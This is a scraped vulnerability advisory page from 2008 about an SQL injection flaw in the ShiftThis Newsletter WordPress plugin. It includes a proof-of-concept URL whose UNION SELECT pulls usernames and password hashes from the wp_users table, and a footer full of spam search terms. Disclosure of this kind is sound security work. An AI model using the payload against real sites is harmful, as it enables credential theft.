about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability


Title WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability
Published 2008-02-03-12:00AM
Updated 2008-02-04-09:27PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  S@BUN discovered this vulnerability.
Vulnerable  ShiftThis ShiftThis Newsletter 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 22:30:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
VIDEO SEX port 5900 DONGAXXX vBulletin www.lv87.c mtab gnopaste-l tamilnadus ddzxs.cn Www.Nayant php-nuke 2 www.youtub inter resu Sexs live nackedwome www.xxx mo modules/co www.18sexy Sexviedo kajol imag Gaya Www.exploi php-nuke 2 creditscar phpBB por iipubikusy Sexiimage t601t gbook.php% www.girls includes/o pax Total Vide gadis.indo ind+sex Neos_Chron CMS is Fre ip board 2 news for c News Searc shatter at news for c virtuaStor www.jjkk36 200 /compo sapid www.sex oc ip+board+2 4410700741 ms rpc exp